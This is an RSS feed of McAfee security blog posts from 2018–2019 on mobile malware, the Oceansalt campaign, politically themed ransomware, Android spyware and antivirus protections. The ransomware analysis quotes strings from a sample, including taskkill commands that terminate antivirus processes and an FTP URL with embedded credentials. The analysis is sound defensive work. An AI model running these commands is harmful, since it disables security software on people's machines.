Raj Samani – McAfee Blogs https://securingtomorrow.mcafee.com Securing Tomorrow. Today. Wed, 15 May 2019 16:35:16 +0000 en-US hourly 1 https://securingtomorrow.mcafee.com/wp-content/uploads/2018/11/cropped-favicon-32x32.png Raj Samani – McAfee Blogs https://securingtomorrow.mcafee.com 32 32 In 2019 the Threat is “Everywhere Malware”, Not just Mobile Malware https://securingtomorrow.mcafee.com/consumer/mobile-and-iot-security/in-2019-the-threat-is-everywhere-malware-not-just-mobile-malware/ https://securingtomorrow.mcafee.com/consumer/mobile-and-iot-security/in-2019-the-threat-is-everywhere-malware-not-just-mobile-malware/#respond Wed, 27 Feb 2019 07:00:42 +0000 https://securingtomorrow.mcafee.com/?p=94289

This time last year, we said that 2018 would be the year of mobile malware. Today at MWC, we’re calling 2019 the year of everywhere malware. In their quest for profit, criminals are constantly forced to shift their tactics and adapt to a changing mobile market. Take crypto-mining, for example. A year ago this was […]

The post In 2019 the Threat is “Everywhere Malware”, Not just Mobile Malware appeared first on McAfee Blogs.

]]>

This time last year, we said that 2018 would be the year of mobile malware.

Today at MWC, we’re calling 2019 the year of everywhere malware.

In their quest for profit, criminals are constantly forced to shift their tactics and adapt to a changing mobile market. Take crypto-mining, for example. A year ago this was a relatively hassle-free way of making money. But the bottom dropped out of the crypto-currency market over the course of 2018. Now it’s not as lucrative, so we witness more aggressive forms of ransomware that make payment more likely.

Our latest Mobile Threat Report has revealed a huge increase in backdoors, fake apps and banking Trojans. Hidden apps are being exploited as quickly as app stores can take them down and adversaries are adapting and developing new threats. The number of attacks on other connected things is growing too – your voice assistant might even be letting criminals into your home. And smartphones, of course, remain a prime target.

In particular, the use of banking Trojans to steal financial credentials has exploded. Their popularity is growing so fast that we saw the number of incidents double between June and September last year. They then spiked by a further 75 percent in December. Android users in particular are being targeted, as malware authors find new ways of bypassing Google’s security. Unfortunately for consumers, these Trojans represent a solid source of income for cybercriminals so, for the foreseeable future at least, we can expect them to continue to evolve and become more sophisticated.

A worrying new trend sees attacks extending beyond mobile apps and operating systems and into our homes. Smart home tech is becoming integral to our domestic lifestyle – there are already over 25 million voice assistants such as Google Home and Alexa in our homes, and this is expected to grow to as many as 275 million within the next five years. Add to this a growing number of connected thermostats, locks and doorbells, and this represents a huge – and hugely attractive – attack vector for cybercriminals. The quirks and vulnerabilities of these devices, coupled with weak to non-existent security controls could provide unfettered access to the rest of your home network.

At the heart of all of this, of course, lies the smartphone. The control hub and gateway to the voice assistants and smart devices we engage with on a day-to-day basis, these devices track where we are, what we’re doing, and often hold important personal information. Access to our smartphones is clearly worth its weight in gold to criminals. After all, from here they steal our bank details and even make their way into our homes. And with new malware families especially designed to trick smartphone users into giving them access, that’s just what they’re trying to do.

The mobile ecosystem is continually changing. Operators and developers can get wise to tactics used by criminals but criminals will never give up in their pursuit for profit. If one door closes on them, they’ll just open another one. They’ll change their tactics and broaden their efforts to target more aspects of our increasingly ubiquitous mobile use.

That’s why the entire tech industry, from the manufacturers of smart device manufacturers and mobile devices to developers and app store owners, must work more closely. Only then will we be able to tackle this insidious threat and protect consumers at every point of their increasingly digital life.

To find out more, see our latest Mobile Threat Report here.

The post In 2019 the Threat is “Everywhere Malware”, Not just Mobile Malware appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/consumer/mobile-and-iot-security/in-2019-the-threat-is-everywhere-malware-not-just-mobile-malware/feed/ 0
MWC 2019: Why 5G + Fortnite = a win-win for criminals https://securingtomorrow.mcafee.com/consumer/mwc-2019-why-5g-fortnite-a-win-win-for-criminals/ https://securingtomorrow.mcafee.com/consumer/mwc-2019-why-5g-fortnite-a-win-win-for-criminals/#respond Mon, 18 Feb 2019 15:00:53 +0000 https://securingtomorrow.mcafee.com/?p=94202

So apparently, the company behind Fortnite has so much cash that it’s forming a $100 million prize fund for upcoming competitions. It’s hardly surprising since its creators, Epic Games, confirmed that by the end of November 2018, 200 million players had registered accounts across PCs, gaming consoles and on mobile. The Android app alone was […]

The post MWC 2019: Why 5G + Fortnite = a win-win for criminals appeared first on McAfee Blogs.

]]>

So apparently, the company behind Fortnite has so much cash that it’s forming a $100 million prize fund for upcoming competitions. It’s hardly surprising since its creators, Epic Games, confirmed that by the end of November 2018, 200 million players had registered accounts across PCs, gaming consoles and on mobile. The Android app alone was downloaded 15 million times within the first three weeks of its release.

Staggeringly though, this remains a ‘free’ game and while the freemium model is hardly new in the world of mobile apps – just consider the returns Supercell got with Clash of Clans – it does provide an opportunity for criminals to also get their share. Unsurprisingly the promise of achieving an advantage is particularly attractive since top gamers can earn hundreds of thousands of dollars.

Combined with alternative delivery methods such as the use of an invitation-only beta version of Fortnite distributed in August 2018, we saw the growth in promises of invitations, and over-eager YouTubers with links to apps that were not what they appeared. From an InfoSec perspective this is hardly surprising, but the reality is that we are dealing with an audience demonstrating no due diligence in their pursuit of access to the latest games.

While Fortnite is undoubtedly a phenomenon, it’s just the tip of the iceberg. There are already challengers nipping at its heels. PUBG Mobile, for example, is played by 30 million people daily, while there are plans for EA’s Apex Legends to move over to mobile, having acquired 10 million online players in its first 72 hours.

The growing appetite for mobile gaming will only increase further this year with the arrival of 5G networks and its promise of super-fast speeds and ultra-low latency. And of course, as the number of mobile gamers continues to grow, so too will the opportunity for criminals to exploit them.

75 percent of gamers claimed security was the element that most concerned them about the future of gaming. Such concerns are hardly surprising since we found almost two thirds of gamers have or know someone who has been directly affected by a cyberattack, with the average gamer experiencing around five attacks. However, the likelihood is that these concerns are put to one side when a link to a third-party app store offers a beta version to the latest gaming phenomenon.

Analysts suggest that 2018 was a tipping point for mobile gaming, when cost, convenience and a social element saw the channel become bigger than console and PC gaming combined. Unfortunately, this means opportunistic criminals now have their eyes on a huge and growing number of potential victims.

Join us at this year’s Mobile World Congress in Barcelona, where we’ll be demoing McAfee Gamer Security, and revealing how criminals are cashing in on Fortnite and its unorthodox distribution method.

The post MWC 2019: Why 5G + Fortnite = a win-win for criminals appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/consumer/mwc-2019-why-5g-fortnite-a-win-win-for-criminals/feed/ 0
McAfee Labs Threats Report Examines Cybercriminal Underground, IoT Malware, Other Threats https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/mcafee-labs-threats-report-examines-cybercriminal-underground-iot-malware-other-threats/ https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/mcafee-labs-threats-report-examines-cybercriminal-underground-iot-malware-other-threats/#respond Wed, 19 Dec 2018 05:01:10 +0000 https://securingtomorrow.mcafee.com/?p=93260

The McAfee Advanced Threat Research team today published the McAfee® Labs Threats Report, December 2018. In this edition, we highlight the notable investigative research and trends in threats statistics and observations gathered by the McAfee Advanced Threat Research and McAfee Labs teams in Q3 of 2018. We are very excited to present to you new […]

The post McAfee Labs Threats Report Examines Cybercriminal Underground, IoT Malware, Other Threats appeared first on McAfee Blogs.

]]>

The McAfee Advanced Threat Research team today published the McAfee® Labs Threats Report, December 2018. In this edition, we highlight the notable investigative research and trends in threats statistics and observations gathered by the McAfee Advanced Threat Research and McAfee Labs teams in Q3 of 2018.

We are very excited to present to you new insights and a new format in this report. We are dedicated to listening to our customers to determine what you find important and how we can add value. In recent months we have gathered more threat intelligence, correlating and analyzing data to provide more useful insights into what is happening in the evolving threat landscape. McAfee is collaborating closely with MITRE Corporation in extending the techniques of its MITRE ATT&CK™ knowledge base, and we now include the model in our report. We are always working to refine our process and reports. You can expect more from us, and we welcome your feedback.

As we dissect the threat landscape for Q3, some noticeable statistics jump out of the report.  In particular, the continued rise in cryptojacking, which has made an unexpected emergence over the course of a year. In Q3 the growth of coin miner malware returned to unprecedented levels after a temporary slowdown in Q2.

Our analysis of recent threats included one notable introduction in a disturbing category. In Q3 we saw two new exploit kits: Fallout and Underminer. Fallout almost certainly had a bearing on the spread of GandCrab, the leading ransomware. Five years ago we published the report “Cybercrime Exposed,” which detailed the rise of cybercrime as a service. Exploit kits are the epitome of this economy, affording anyone the opportunity to easily and cheaply enter the digital crime business.

New malware samples jumped up again in Q3 after a decline during the last two quarters. Although the upward trend applies to almost every category, we did measure a decline in new mobile malware samples following three quarters of continual growth.

This post is only a small snapshot of the comprehensive analysis provided in the December Threats Report. We hope you enjoy the new format, and we welcome your feedback.

The post McAfee Labs Threats Report Examines Cybercriminal Underground, IoT Malware, Other Threats appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/mcafee-labs-threats-report-examines-cybercriminal-underground-iot-malware-other-threats/feed/ 0
‘Operation Oceansalt’ Delivers Wave After Wave https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/operation-oceansalt-delivers-wave-after-wave/ https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/operation-oceansalt-delivers-wave-after-wave/#respond Thu, 18 Oct 2018 04:01:03 +0000 https://securingtomorrow.mcafee.com/?p=91999 In the latest findings from the McAfee Advanced Threat Research team, we examine an adversary that was not content with a single campaign, but launched five distinct waves adapted to their separate targets.

The post ‘Operation Oceansalt’ Delivers Wave After Wave appeared first on McAfee Blogs.

]]>
A wall eight feet high with three strands of barbed wire is considered sufficient to deter a determined intruder, at least according to the advice offered by the CISSP professional certification. Although physical controls can be part of a multifaceted defense, an electronic attack affords the adversary time to develop the necessary tools to bypass any logical wall set before them. In the latest findings from the McAfee Advanced Threat Research team, we examine an adversary that was not content with a single campaign, but launched five distinct waves adapted to their separate targets. The new report “Operation Oceansalt Attacks South Korea, U.S., and Canada with Source Code from Chinese Hacker Group” analyzes these waves and their victims, primarily in South Korea but with a few in the United States and Canada.

Although one reaction is to marvel at the level of innovation displayed by the threat actor(s), we are not discussing five new, never-before-seen malware variants—rather the reuse of code from implants seen eight years prior. The Oceansalt malware uses large parts of code from the Seasalt implant, which was linked to the Chinese hacking group Comment Crew. The level of reuse is graphically depicted below:

Code Visualization of Recent Oceansalt with Older Seasalt

Oceansalt, 2018.

Seasalt, 2010.

Who is Behind the Oceansalt Attack?

Originally taking the title APT1, the Comment Crew was seen as the threat actor conducting offensive cyber operations against the United States almost 10 years before. The obvious suspect is Comment Crew and, although this may seem a logical conclusion, we have not seen any activity from this group since they were initially exposed. Is it possible that this group has returned and, if so, why target South Korea?

It is possible that the source code developed by Comment Crew has now been used by another adversary. The code to our knowledge, however, has never been made public. Alternatively, this could be a “false flag” operation to suggest that we are seeing the re-emergence of Comment Crew. Creating false flags is a common practice.

What Really Matters

It is likely that reactions to this research will focus on debating the identity of the threat actor. Although this question is of great interest, answering it will require more than the technical evidence that private industry can provide. These limitations are frustrating. However, we can focus on the indicators of compromise presented in this report to detect, correct, and protect our systems, regardless of the source of these attacks.

Perhaps more important is the possible return of a previously dormant threat actor and, further, why should this campaign occur now? Regardless of whether this is a false flag operation to suggest the rebirth of Comment Crew, the impact of the attack is unknown. However, one thing is certain. Threat actors have a wealth of code available to leverage new campaigns, as previous research from the Advanced Threat Research team has revealed. In this case we see that collaboration not within a group but potentially with another threat actor—offering up considerably more malicious assets. We often talk about partnerships within the private and public sector as the key to tackling the cybersecurity challenges facing society. The bad actors are not putting these initiatives on PowerPoint slides and marketing material; they are demonstrating that partnerships can suit their ends, too.

The post ‘Operation Oceansalt’ Delivers Wave After Wave appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/operation-oceansalt-delivers-wave-after-wave/feed/ 0
Political Figures Differ Online: Names of Trump, Obama, Merkel Attached to Ransomware Campaigns https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/political-figures-differ-online-names-of-trump-obama-merkel-attached-to-ransomware-campaigns/ https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/political-figures-differ-online-names-of-trump-obama-merkel-attached-to-ransomware-campaigns/#respond Tue, 18 Sep 2018 04:01:37 +0000 https://securingtomorrow.mcafee.com/?p=91510 Politics and ransomware. No, it’s not a lost single from the Oasis back catalogue, but in fact a relatively recent tactic by ransomware developers looking to exploit the profiles of major politicians to install ransomware on victims’ computers. Donald Trump, Angela Merkel, and now Barack Obama all serve as lures for the unsuspecting. Despite its […]

The post Political Figures Differ Online: Names of Trump, Obama, Merkel Attached to Ransomware Campaigns appeared first on McAfee Blogs.

]]>
Politics and ransomware. No, it’s not a lost single from the Oasis back catalogue, but in fact a relatively recent tactic by ransomware developers looking to exploit the profiles of major politicians to install ransomware on victims’ computers. Donald Trump, Angela Merkel, and now Barack Obama all serve as lures for the unsuspecting. Despite its claims, does the “Obama campaign” deliver the ransomware it advertises? Well, perhaps not.

The Obama campaign

Recently identified by the MalwareHunterTeam and documented by Bleeping Computer, the Obama campaign displayed some confusing characteristics. For example, it encrypted only .exe files and asked for a tip to decrypt the files. This campaign does not behave like normal ransomware variants, which typically target user data files rather than .exe files.

This unorthodoxy got us thinking: Was there a nation-state behind this campaign? At present, there is not enough evidence to confirm its source, although the language resources are in simplified Chinese. We discovered the following graph inside the ransomware:

As the MalwareHunterTeam documented, the ransomware attempts to kill processes associated with certain antimalware products:

  • .rdata:004DAC80 0000001B C taskkill /f /im kavsvc.exe
  • .rdata:004DAC9B 00000019 C taskkill /f /im KVXP.kxp
  • .rdata:004DACB4 00000018 C taskkill /f /im Rav.exe
  • .rdata:004DACCC 0000001B C taskkill /f /im Ravmon.exe
  • .rdata:004DACE7 0000001D C taskkill /f /im Mcshield.exe
  • .rdata:004DAD04 0000001D C taskkill /f /im VsTskMgr.exe
  • .rdata:004DAD21 00000024 C SOFTWARE\\360Safe\\safemon\\ExecAccess
  • .rdata:004DAD45 00000023 C SOFTWARE\\360Safe\\safemon\\MonAccess
  • .rdata:004DAD68 00000024 C SOFTWARE\\360Safe\\safemon\\SiteAccess
  • .rdata:004DAD8C 00000025 C SOFTWARE\\360Safe\\safemon\\UDiskAccess

Note, however, that the access protection enabled within McAfee software prevented the termination of this process:

These curiosities made us wonder about the purpose of the ransomware. Was this indeed ransomware and, if so, why encrypt only .exe files? Our initial suspicions were immediately confirmed when we found a cryptocurrency coin mining component within the malware. In fact, the miner sample was almost identical to the ransomware component, with almost 80% code reuse. These similarities are highlighted below.

Executable extension search function:

Code flow in the “Obama campaign” ransomware.

Code flow in the coin miner sample.

We also found this URL pointing to an FTP server:

  • FtpMoney812345 db ‘ftp://money8:12345678@xxxxxxxxxx.net/88.txt

The Trump campaign

A ransomware campaign leveraging images of Donald Trump has been previously documented. Is it possible that the two politicians are aligned with the same cybercriminal group looking to exploit their profiles?

  

As previously reported, this variant was only a development version—encrypting files with AES and using the following .encrypted extension:

However, this ransomware can “decrypt” the files if one clicks on an “unlock files” button.

Code referencing decryption by button click:

And for unlocking files:

The Angela Merkel campaign 

 

The use of Angela Merkel and her profile is new to the discussion. “Her” campaign encrypts files using the .angelamerkel extension. The original name of this ransomware was ChromeUpadter.exe; it also uses AES to encrypt files. It employs the Euro in its ransom demands. Perhaps a European figure evokes the Euro?

This ransomware encrypts the following files:

Malware developers are fond of exploiting famous names to lure unsuspecting victims. Although it would be simple to claim an increase in politically motivated ransomware, or rather ransomware that leverages the profiles of political figures, there is no significant evidence to suggest they are from the same threat actor. Equally, these campaigns might not even be ransomware, certainly in the case of the Obama campaign.

Does this examination suggest three separate campaigns? There are some links and, no, they are not between Obama and Trump. The Trump and Merkel ransomware are 46% identical in code. We are left wondering whose campaign is the most successful. We shall see.

The post Political Figures Differ Online: Names of Trump, Obama, Merkel Attached to Ransomware Campaigns appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/political-figures-differ-online-names-of-trump-obama-merkel-attached-to-ransomware-campaigns/feed/ 0
McAfee ePO Platform Gains Insight Into Threat Research https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/mcafee-epo-platform-gains-insight-into-threat-research/ https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/mcafee-epo-platform-gains-insight-into-threat-research/#respond Tue, 14 Aug 2018 21:49:25 +0000 https://securingtomorrow.mcafee.com/?p=90918 The latest update to the McAfee® ePolicy Orchestrator® platform offers a new add-in to provide insight into the latest analysis carried out by McAfee Labs and the Advanced Threat Research team.

The post McAfee ePO Platform Gains Insight Into Threat Research appeared first on McAfee Blogs.

]]>
The latest update to the McAfee® ePolicy Orchestrator® platform offers a new add-in to provide insight into the latest analysis carried out by McAfee Labs and the Advanced Threat Research team. The Security Resources section of the McAfee ePO™ console Version 5.10.0 will contain multiple windows providing the latest news.

The first window in the section shows an updated list of the most recent threats research published by the McAfee Labs team. This includes both malware and vulnerability research. For example, this week we released a report that shows it is possible to emulate and modify a patient’s vital signs in real time on a medical network using a patient monitor and central monitoring station. We also include research related to new malware campaigns. All our content is mapped to the MITRE ATT&CK framework and includes all known indicators of compromise, as well as detailing how McAfee products protect against the documented campaign.

Top threats

The section includes a condensed version of the Threat Landscape Dashboard, which contains the top threats across exploit kits, campaigns, ransomware, and vulnerabilities. The following screen shows how the summary will appear in the McAfee ePO console, allowing readers to easily review and click through these threats for more detail.

The latest McAfee ePO console will offer an easy review of analysis gathered by McAfee Labs and the Advanced Threat Research team.

Top stories
Want to know more? The Top Stories section offers the latest information from McAfee news sources, including new product releases and new blog content (beyond threats analysis).

Support and product advisories

At the bottom right of the screen you will find Security Product Advisories:

  • Support Notification Service: McAfee SNS is a proactive notification service that allows McAfee to communicate critical information in a timely manner on product upgrades, releases, and end-of-life notices. SNS is a vital information link during critical incidents, providing you with the updates you need to ensure that your systems and organization are protected.
  • Product Security Bulletins: McAfee is focused on ensuring the security of our customers’ computers, networks, devices, and data. We are committed to rapidly addressing issues as they arise, and providing recommendations through security bulletins and knowledgebase articles.
  • McAfee Labs Security Advisories: These are a free notification service backed by our global research team. McAfee Labs Security Advisories map high-profile threats to the McAfee technologies that protect your environment.

What next?

You can expect the dashboard to evolve and provide more detail in future versions. Please let us know what you would like to see.

 

The post McAfee ePO Platform Gains Insight Into Threat Research appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/mcafee-epo-platform-gains-insight-into-threat-research/feed/ 0
Google Play Users Risk a Yellow Card With Android/FoulGoal.A https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/google-play-users-risk-a-yellow-card-with-android-foulgoal-a/ https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/google-play-users-risk-a-yellow-card-with-android-foulgoal-a/#respond Thu, 12 Jul 2018 13:00:42 +0000 https://securingtomorrow.mcafee.com/?p=90299 This blog post was co-written by Irfan Asrar. English soccer fans have enthusiastically enjoyed the team’s current run in the World Cup, as the tune “Three Lions” plays in their heads, while hoping to end 52 years of hurt. Meanwhile a recent spyware campaign distributed on Google Play has hurt fans of the beautiful game […]

The post Google Play Users Risk a Yellow Card With Android/FoulGoal.A appeared first on McAfee Blogs.

]]>
This blog post was co-written by Irfan Asrar.

English soccer fans have enthusiastically enjoyed the team’s current run in the World Cup, as the tune “Three Lions” plays in their heads, while hoping to end 52 years of hurt. Meanwhile a recent spyware campaign distributed on Google Play has hurt fans of the beautiful game for some time. Using major events as social engineering is nothing new, as phishing emails have often taken advantage of disasters and sporting events to lure victims.

“Golden Cup” is the malicious app that installs spyware on victims’ devices. It was distributed via Google Play, and “offered” the opportunity to stream games and search for records from the current and past World Cups. McAfee Mobile Security identifies this threat as Android/FoulGoal.A; Google has removed the malicious applications from Google Play.

Once Golden Cup is installed it appears to be a typical sporting app, with multimedia content and general information about the event. Most of this data comes from a web service without malicious activity. However, in the background and without user consent the app silently transfers information to another server.

Data captured

Golden Cup captures a considerable amount of encrypted data from the victim’s device:

  • Phone number
  • Installed packages
  • Device model, manufacturer, serial number
  • Available internal storage capacity
  • Device ID
  • Android version
  • IMEI, IMSI

This spyware may be just the first stage of a greater infection due to its capability to load dex files from remote sources. The app connects to its control server and tries to download, unzip, and decrypt a second stage.

Android/FoulGoal.A detects when the screen is on or off and records this in its internal file scrn.txt, with the strings “on” or “off” to track when users are looking at their screens:

The Message Queuing Telemetry Transport protocol serves as the communication channel between the device and the malicious server to send and receive commands.

Data encryption

User data is encrypted with AES before it is sent to the control server. Cryptor class provides the encryption and decryption functionality. The doCrypto function is defined as a common function. As the first parameter of the function, “1” represents encryption and “2” is decryption mode:

The encryption key is generated dynamically using the SecureRandom function, which generates a unique value on the device to obfuscate the data. The addKey function embeds the encryption key into the encryption data. The data with the key is uploaded to the control server.

We believe the malware author uses this AES encryption technique for any information to be uploaded to escape the detection by Google Bouncer and network inspection products.

Our initial analysis suggests there were at least 300 infections, which we suspect occurred between June 8‒12, before the first World Cup matches began.

The second round

The second phase of the attack leverages an encrypted dex file. The file has a .data extension and is downloaded and dynamically loaded by the first-stage malware; it is extracted with the same mechanism used to upload the encrypted files. The location of the decryption key can be identified from the size of the contents and a fixed number in the first-stage malware.

After decryption, we can see out.dex in zipped format. The dex file has spy functions to steal SMS messages, contacts, multimedia files, and device location from infected devices.

The control server in second stage is different from the first stage’s. The encryption methodology and the server folder structures on the remote server are identical to the first stage.

We found one victim’s GPS location information and recorded audio files (.3gp) among the encrypted data on the control server.

Variants

We have also discovered two other variants of this threat created by the same authors and published to Google Play as dating apps. Although all the apps have been removed from Google Play, we still see indications of infections from our telemetry data, so we know these apps are active on some users’ devices.

Our telemetry data indicates that although users around the world have downloaded the app, the majority of downloads took place in the Middle East, most likely as a result of a World Cup–themed Twitter post in Hebrew directing people to download the app for a breakdown of the latest events.

McAfee Mobile Security users are protected against all the variants of this threat, detected as   Android/FoulGoal.A.

The post Google Play Users Risk a Yellow Card With Android/FoulGoal.A appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/google-play-users-risk-a-yellow-card-with-android-foulgoal-a/feed/ 0
AsiaHitGroup Returns With New Billing-Fraud Campaign https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/asiahitgroup-returns-with-new-billing-fraud-campaign/ https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/asiahitgroup-returns-with-new-billing-fraud-campaign/#respond Thu, 28 Jun 2018 01:32:13 +0000 https://securingtomorrow.mcafee.com/?p=90111 Are you tired yet of the music track “Despacito”? If you downloaded this ringtone app from Google Play, chances are your answer is a resounding Yes. But it gets worse: The McAfee Mobile Research team recently found 15 apps on Google Play that were uploaded by the AsiaHitGroup Gang. The ringtone app was one of […]

The post AsiaHitGroup Returns With New Billing-Fraud Campaign appeared first on McAfee Blogs.

]]>
Are you tired yet of the music track “Despacito”? If you downloaded this ringtone app from Google Play, chances are your answer is a resounding Yes. But it gets worse: The McAfee Mobile Research team recently found 15 apps on Google Play that were uploaded by the AsiaHitGroup Gang. The ringtone app was one of them—downloaded 50,000 times from the official app store—that were designed to steal money from their victims. The AsiaHitGroup Gang has been active since at least 2016, attempting to charge 20,000 victims for the download of popular mobile applications containing the fake-installer app Sonvpay.A. For more analysis, see the Mobile Research team’s post.

Ordinarily we advise users to review the requested permissions before installing a mobile app, and normally this is enough. In this case, the only permission requested was access to SMS messages, and once installed the app behaved as expected. In the background, however, Sonvpay silently used the push notification service to subscribe users to premium-rate services.

This campaign displays a significant level of customization. The criminals can tailor their fraud to the country of their choosing. In our analysis we looked at mobile billing fraud targeting users in Kazakhstan, Malaysia, and Russia. In Kazakhstan victims are subscribed to a premium-rate service whereas in Malaysia and Russia they are connected to a WAP billing service. Further, the criminals recognize that in Malaysia the mobile operator sends a PIN code, so the attackers include functionality to intercept the SMS. Once intercepted, the app communicates with the mobile operator to subscribe to the service.

This group began targeting users in Asia, but the move to Russia shows its increasing ambition. The goal of the AsiaHitGroup Gang remains the same, but the manner in which they attempt to achieve their ends differs per campaign, and their techniques are improving. Although the security industry focuses much attention on “loud” and destructive attacks, many campaigns quietly steal funds from unsuspecting victims or those who have little visibility into what is happening.

The post AsiaHitGroup Returns With New Billing-Fraud Campaign appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/asiahitgroup-returns-with-new-billing-fraud-campaign/feed/ 0
‘McAfee Labs Threats Report’ Spotlights Innovative Attack Techniques, Cryptocurrency Mining, Multisector Attacks https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/mcafee-labs-threats-report-spotlights-innovative-attack-techniques-cryptocurrency-mining-multisector-attacks/ https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/mcafee-labs-threats-report-spotlights-innovative-attack-techniques-cryptocurrency-mining-multisector-attacks/#respond Wed, 27 Jun 2018 04:01:07 +0000 https://securingtomorrow.mcafee.com/?p=89357 In the McAfee Labs Threats Report June 2018, published today, we share investigative research and threat statistics gathered by the McAfee Advanced Threat Research and McAfee Labs teams in Q1 of this year.

The post ‘McAfee Labs Threats Report’ Spotlights Innovative Attack Techniques, Cryptocurrency Mining, Multisector Attacks appeared first on McAfee Blogs.

]]>
In the McAfee Labs Threats Report June 2018, published today, we share investigative research and threat statistics gathered by the McAfee Advanced Threat Research and McAfee Labs teams in Q1 of this year. We have observed that although overall new malware has declined by 31% since the previous quarter, bad actors are working relentlessly to develop new technologies and tactics that evade many security defenses.

These are the key campaigns we cover in this report.

  • Deeper investigations reveal that the attack targeting organizations involved in the Pyeongchang Winter Olympics in South Korea used not just one PowerShell implant script, but multiple implants, including Gold Dragon, which established persistence to engage in reconnaissance and enable continued data exfiltration.
  • The infamous global cybercrime ring known as Lazarus has resurfaced. We discovered that the group has launched the Bitcoin-stealing phishing campaign “HaoBao,” which targets the financial sector and Bitcoin users.
  • We are also seeing the emergence of a complex, multisector campaign dubbed Operation GhostSecret, which uses many data-gathering implants. We expect to see an escalation of these attacks in the near future.

Here are some additional findings and insights:

  • Ransomware drops: New ransomware attacks took a significant dive (-32%), largely as a result of an 81% drop in Android lockscreen malware.
  • Cryptojacking makes a comeback: Attackers targeting cryptocurrencies may be moving from ransomware to coin miner malware, which hijacks systems to mine for cryptocurrencies and increase their profits. New coin miner malware jumped an astronomical 1,189% in Q1.
  • LNK outpaces PowerShell: Cybercriminals are increasingly using LNK shortcuts to surreptitiously deliver malware. New PowerShell malware dropped 77% in Q1, while attacks leveraging Microsoft Windows LNK shortcut files jumped 24%.
  • Incidents go global: Overall security incidents rose 41% in Q1, with incidents hitting multiple regions showing the biggest increase, at 67%, and the Americas showing the next largest increase, at 40%.

Get all the details by reading the McAfee Labs Threats Report, June 2018.

The post ‘McAfee Labs Threats Report’ Spotlights Innovative Attack Techniques, Cryptocurrency Mining, Multisector Attacks appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/mcafee-labs-threats-report-spotlights-innovative-attack-techniques-cryptocurrency-mining-multisector-attacks/feed/ 0
McAfee Protects Against Doppelgänging Technique https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/mcafee-protects-against-doppelganging-technique/ https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/mcafee-protects-against-doppelganging-technique/#respond Fri, 11 May 2018 15:00:40 +0000 https://securingtomorrow.mcafee.com/?p=88808 This blog was co-written with Brook Schoenfield. That adversaries adopt new techniques is a known fact. However, the speed they include new innovative techniques to bypass end-point security and or evade sandboxing appears to be at an ever-increasing pace. Indeed, adversary adoption is often faster than the InfoSec industry can implement and test effective countermeasures. […]

The post McAfee Protects Against Doppelgänging Technique appeared first on McAfee Blogs.

]]>
This blog was co-written with Brook Schoenfield.

That adversaries adopt new techniques is a known fact. However, the speed they include new innovative techniques to bypass end-point security and or evade sandboxing appears to be at an ever-increasing pace. Indeed, adversary adoption is often faster than the InfoSec industry can implement and test effective countermeasures. For example, in December 2017, a tool was released to hide PowerShell in a graphic file. Within 7 days of the release, McAfee Advanced Threat Research started to see the technique being exploited by a Nation State actor. From announcement to inclusion, test and use in production within 7 days is impressive.

This week, security-researchers from Kaspersky discovered that an actor was applying the so-called Process Doppelgänging technique in what has been named the “SynAck” ransomware. (https://securelist.com/synack-targeted-ransomware-uses-the-doppelganging-technique/85431/)

So What is the Process Doppelgänging Technique in a Nutshell?

Using this technique gives the malware writer an ability to run malicious code/executable under the cover of a legitimate executable by using the transaction features of the NTFS filesystem (Windows Transactional NTFS API).

McAfee Detects and Protects

Since the initial release of this technique in December 2017, McAfee Labs has been investigating this technique and how we might protect our customers. In contrast to adversaries who can release mistakes in code and implementation, we simply cannot. We have to thoroughly test to ensure that when we release our solution it detects correctly and does not disrupt or break other software.

McAfee’s Product Security Incident Team (PSIRT), working in coordination with McAfee’s product teams1 delivered a protection to Process Doppelgänging in two of McAfee’s product suites (see below for more detail). McAfee’s protection has tested effective against EnSilo’s original proof of concept (PoC) and other examples. As an example, we tested recent malware using the technique against our detection feature with success:

McAfee’s protection prevents execution of a file if changes to it are contained within a Windows NTFS transaction. There are no legitimate uses for the Transactional API to be used in this way, so far as McAfee know.

Details of products that include protection against Process Doppelgänging follow:

  • ENS 10.5.4, released April 24, 2018
  • VSE 8.8 patch 11, released April 24, 2018
  • ENS 10.6, Public Beta available March 9, 2018. Release is targeted around June 1, 2018

WSS 16.0.12 will include the same protection.  Release of WSS is targeted for the end of May, or the beginning of June, 2018.

What Is Protected 

Windows 7 & 8 -> McAfee protection is effective

Win 10 RS3 -> McAfee protection is effective

Win 10 RS4 -> Microsoft has implemented the same protection as McAfee

EnSilo have documented that attempts to exploit Win 10 Pre RS3 results in a Windows crash, “Blue Screen of Death” (BSOD). McAfee’s testing confirms Ensilo’s results.

Users may not see a detection alert with some versions of McAfee products under some versions of Windows. McAfee testing indicates that all versions of product under every Windows version listed above are protected.

 

1McAfee thanks McAfee Software Engineer, Alnoor Allidina for the diligence and insight that lead to the Process Dopplegänging protection.

The post McAfee Protects Against Doppelgänging Technique appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/mcafee-protects-against-doppelganging-technique/feed/ 0
